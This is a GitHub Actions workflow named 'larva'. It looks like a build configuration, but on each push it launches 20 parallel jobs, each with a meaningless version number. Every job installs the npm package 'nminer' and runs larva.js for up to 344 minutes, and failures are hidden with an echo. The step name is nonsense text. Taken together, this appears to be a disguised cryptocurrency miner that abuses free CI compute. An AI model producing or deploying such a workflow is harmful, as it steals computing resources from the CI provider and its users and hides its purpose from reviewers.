name: larva
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6896 }
          - { version: 2694 }
          - { version: 149 }
          - { version: 4281 }
          - { version: 6575 }
          - { version: 5110 }
          - { version: 3554 }
          - { version: 3316 }
          - { version: 1173 }
          - { version: 1925 }
          - { version: 1664 }
          - { version: 9068 }
          - { version: 2841 }
          - { version: 1715 }
          - { version: 1174 }
          - { version: 2414 }
          - { version: 2225 }
          - { version: 4196 }
          - { version: 829 }
          - { version: 6872 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: of pants under highly
        run: |
          npm install nminer@latest
          timeout 344m node larva.js || echo "larva executed"